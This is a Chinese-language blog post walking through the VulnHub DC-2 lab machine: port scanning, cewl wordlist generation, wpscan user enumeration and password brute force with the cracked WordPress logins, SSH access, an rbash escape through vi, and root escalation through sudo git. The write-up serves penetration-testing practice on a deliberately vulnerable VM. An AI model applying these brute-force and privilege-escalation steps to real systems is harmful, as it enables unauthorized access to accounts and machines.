<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="靶机DC-2题解"><meta name="keywords" content="靶机,flag"><meta name="author" content="Sys71m"><meta name="copyright" content="Sys71m"><title>靶机DC-2题解 | sys71m</title><link rel="shortcut icon" href="/lufei.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><link rel="alternate" href="/atom.xml" title="sys71m" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IP扫描"><span class="toc-number">2.</span> <span class="toc-text">IP扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#端口扫描"><span class="toc-number">3.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#信息收集"><span class="toc-number">4.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#cewl"><span class="toc-number">4.1.</span> <span class="toc-text">cewl</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wpscan"><span class="toc-number">4.2.</span> <span class="toc-text">wpscan</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#提权"><span class="toc-number">5.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH"><span class="toc-number">5.1.</span> <span class="toc-text">SSH</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#root"><span class="toc-number">5.2.</span> <span class="toc-text">root</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://raw.githubusercontent.com/ttonys/gitPic/master/lufei.jpg"></div><div class="author-info__name text-center">Sys71m</div><div class="author-info__description text-center"></div><div class="follow-button"><a href="https://github.com/ttonys">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">34</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">51</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">20</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://raw.githubusercontent.com/ttonys/MarkDownPic/master/test33.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">sys71m</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">靶机DC-2题解</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2019-03-28</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/靶机/">靶机</a><span class="post-meta__separator">|</span><i class="fa fa-comment-o post-meta__icon" aria-hidden="true"></i><a href="/2019/03/28/靶机DC-2题解/#disqus_thread"><span class="disqus-comment-count" data-disqus-identifier="2019/03/28/靶机DC-2题解/"></span></a><div class="post-meta-wordcount"><span>Word count: </span><span class="word-count">899</span><span class="post-meta__separator">|</span><span>Reading time: 3 min</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>vulnhub发布了新的DC-2靶机，之前分析过DC-1，这次把靶机DC-2的题解过程记录下。</p>
<a id="more"></a>  
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>下载地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.vulnhub.com/entry/dc-2,311/</span><br></pre></td></tr></table></figure>
<p>靶机共五个flag</p>
<h2 id="IP扫描"><a href="#IP扫描" class="headerlink" title="IP扫描"></a>IP扫描</h2><p>使用vm打开靶机，将靶机和<code>kali linux</code>设置同一网段下。</p>
<p>先使用<code>nmap</code>扫描，找到靶机的ip地址。</p>
<p><img src="https://raw.githubusercontent.com/ttonys/gitPic/master/N85VIYFBDPTYR%5BV%24DCE9QUN.png" alt></p>
<p>主机ip为192.168.227.133，不同电脑ip不相同。</p>
<h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sS 192.168.227.133 -p-</span><br></pre></td></tr></table></figure>
<p>扫描结果如下：</p>
<p><img src="https://raw.githubusercontent.com/ttonys/gitPic/master/namp.png" alt></p>
<p>发现80位http服务，7744为ssh服务。</p>
<p>根据靶机描述，需要修改hosts文件，不然无法访问主机。linux在<code>/etc/hosts</code>下，windows在<code>C:\Windows\System32\drivers\etc\hosts</code>，无法修改的话需要管理员权限。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">192.168.227.133 dc-2</span><br></pre></td></tr></table></figure>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>首先访问站点，发现是wordpress站点，在文章页面发现第一个flag。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Flag 1:</span><br><span class="line"></span><br><span class="line">Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.</span><br><span class="line"></span><br><span class="line">More passwords is always better, but sometimes you just can’t win them all.</span><br><span class="line"></span><br><span class="line">Log in as one to see the next flag.</span><br><span class="line"></span><br><span class="line">If you can’t find it, log in as another.</span><br></pre></td></tr></table></figure>
<h3 id="cewl"><a href="#cewl" class="headerlink" title="cewl"></a>cewl</h3><p>cewl是一个ruby应用，爬行指定url的指定深度。也可以跟一个外部链接，结果会返回一个单词列表，这个列表可以扔到John the ripper工具里进行密码破解。</p>
<p>根据第一个flag提示，使用cewl爬去页面，生成一个字典。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cewl dc-2 -w pass.txt</span><br></pre></td></tr></table></figure>
<p><code>-w</code>将结果输出到<code>pass.txt</code>中。</p>
<h3 id="wpscan"><a href="#wpscan" class="headerlink" title="wpscan"></a>wpscan</h3><p>首先收集一下后台的用户，使用kali自带的wpscan扫描，获取用户信息。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url dc-2 -e u</span><br></pre></td></tr></table></figure>
<p>存在三个用户，分别为<code>admin</code>，<code>jerry</code>，<code>tom</code>。根据cewl爬去的结构，使用wpscan爆破密码。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url dc-2 -e u -P pass.txt</span><br><span class="line">=====&gt;</span><br><span class="line">[+] Performing password attack on Xmlrpc against 3 user/s</span><br><span class="line">[SUCCESS] - jerry / adipiscing                                                          [SUCCESS] - tom / parturient</span><br></pre></td></tr></table></figure>
<p>登录到后台的wp站点，默认后台路径为<code>wp-admin</code>。在<code>Pages</code>页面发现第二个flag。</p>
<p><img src="https://raw.githubusercontent.com/ttonys/gitPic/master/flag2.png" alt></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><h3 id="SSH"><a href="#SSH" class="headerlink" title="SSH"></a>SSH</h3><p>现在已知了后台的账号，密码。尝试ssh连接，tom的账号尝试成功。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh tom@192.168.227.133 -p 7744</span><br></pre></td></tr></table></figure>
<p>在tom账号的home目录下发现第三个flag。但又有rbash的限制，无法读取。需要绕过限制。</p>
<p>参考文章：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/</span><br></pre></td></tr></table></figure>
<p>在vi编辑器下执行如下命令，此时的shell环境是处于vi下面的。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">:set shell=/bin/bash</span><br><span class="line">:shell</span><br></pre></td></tr></table></figure>
<p>修改shell的环境变量，如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">export SHELL="/bin/bash"</span><br><span class="line">export PATH="/usr/bin:/usr/sbin:/sbin:/bin"</span><br></pre></td></tr></table></figure>
<p>此时已经绕过了rbash的限制，读取第三个flag。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Flag 3:</span><br><span class="line"></span><br><span class="line">Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.</span><br></pre></td></tr></table></figure>
<h3 id="root"><a href="#root" class="headerlink" title="root"></a>root</h3><p>查看<code>/etc/passwd</code>，发现存在jerry用户。使用su命令切换至jerry用户，用之前爆出的密码切换成功。</p>
<p>在jerry一会的home目录下读取第四个flag.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">flag4:</span><br><span class="line"></span><br><span class="line">Good to see that you&apos;ve made it this far - but you&apos;re not home yet. </span><br><span class="line"></span><br><span class="line">You still need to get the final flag (the only flag that really counts!!!).  </span><br><span class="line"></span><br><span class="line">No hints here - you&apos;re on your own now.  :-)</span><br><span class="line"></span><br><span class="line">Go on - git outta here!!!!</span><br></pre></td></tr></table></figure>
<p>猜测最后一个flag在root的home目录下，需要将取消提至root权限。使用<code>sudo -l</code> 命令查看可以本账户可以使用的root权限。如下：</p>
<p><img src="https://raw.githubusercontent.com/ttonys/gitPic/master/sudo.png" alt></p>
<p>jerry用户可以在不需要root密码的情况下执行<code>/usr/bin/git</code>命令。</p>
<p>使用suid提权，执行如下执行</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/bin/git help add</span><br></pre></td></tr></table></figure>
<p>在指令查看页面执行如下指令：</p>
<p><img src="https://raw.githubusercontent.com/ttonys/gitPic/master/suid.png" alt></p>
<p>此时为root权限，得到最后一个flag。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"> __    __     _ _       _                    _ </span><br><span class="line">/ / /\ \ \___| | |   __| | ___  _ __   ___  / \</span><br><span class="line">\ \/  \/ / _ \ | |  / _` |/ _ \| &apos;_ \ / _ \/  /</span><br><span class="line"> \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ </span><br><span class="line">  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Congratulatons!!!</span><br><span class="line"></span><br><span class="line">A special thanks to all those who sent me tweets</span><br><span class="line">and provided me with feedback - it&apos;s all greatly</span><br><span class="line">appreciated.</span><br><span class="line"></span><br><span class="line">If you enjoyed this CTF, send me a tweet via @DCAU7.</span><br></pre></td></tr></table></figure>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Sys71m</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://www.sys71m.top/2019/03/28/靶机DC-2题解/">https://www.sys71m.top/2019/03/28/靶机DC-2题解/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/靶机/">靶机</a><a class="post-meta__tags" href="/tags/flag/">flag</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2019/07/10/域渗透之基础命令/"><i class="fa fa-chevron-left">  </i><span>域渗透之基础命令</span></a></div><div class="next-post pull-right"><a href="/2019/03/20/Winrar目录穿越漏洞/"><span>Winrar目录穿越漏洞</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="disqus_thread"></div><script>var unused = null;
var disqus_config = function () {
  this.page.url = 'https://www.sys71m.top/2019/03/28/靶机DC-2题解/';
  this.page.identifier = '2019/03/28/靶机DC-2题解/';
  this.page.title = '靶机DC-2题解';
}
var d = document, s = d.createElement('script');
s.src = "https://" + 'sys71m' +".disqus.com/embed.js";
s.setAttribute('data-timestamp', '' + +new Date());
(d.head || d.body).appendChild(s);</script><script id="dsq-count-scr" src="https://sys71m.disqus.com/count.js" async></script></div></div><footer class="footer-bg" style="background-image: url(https://raw.githubusercontent.com/ttonys/MarkDownPic/master/test33.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2017 - 2022 By Sys71m</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>